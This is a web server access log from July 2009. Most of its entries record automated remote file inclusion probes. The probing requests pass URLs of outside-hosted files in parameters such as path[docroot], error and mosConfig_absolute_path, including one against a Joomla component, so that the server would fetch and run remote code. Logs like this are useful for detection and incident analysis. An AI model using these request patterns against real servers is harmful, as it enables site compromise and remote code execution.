124.0.145.1 - - [13/Jul/2009:02:24:26 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:02:24:45 -0400] "GET //?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:02:24:45 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:02:24:45 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:25:12 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:25:12 -0400] "GET //?path%5Bdocroot%5D=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:25:12 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 200 9329 "-" "Mozilla/5.0"
65.254.32.2 - - [13/Jul/2009:02:25:13 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:02:25:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.145.1 - - [13/Jul/2009:02:25:59 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:27:04 -0400] "GET /logs/access_log.Q109062900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:02:27:47 -0400] "GET /logs/access_log.Q109050900%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:02:27:50 -0400] "GET //?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:02:27:50 -0400] "GET /logs/access_log.Q109051800%20%20//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.205.57.2 - - [13/Jul/2009:02:27:50 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:02:28:00 -0400] "GET //?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:02:28:00 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9329 "-" "Mozilla/5.0"
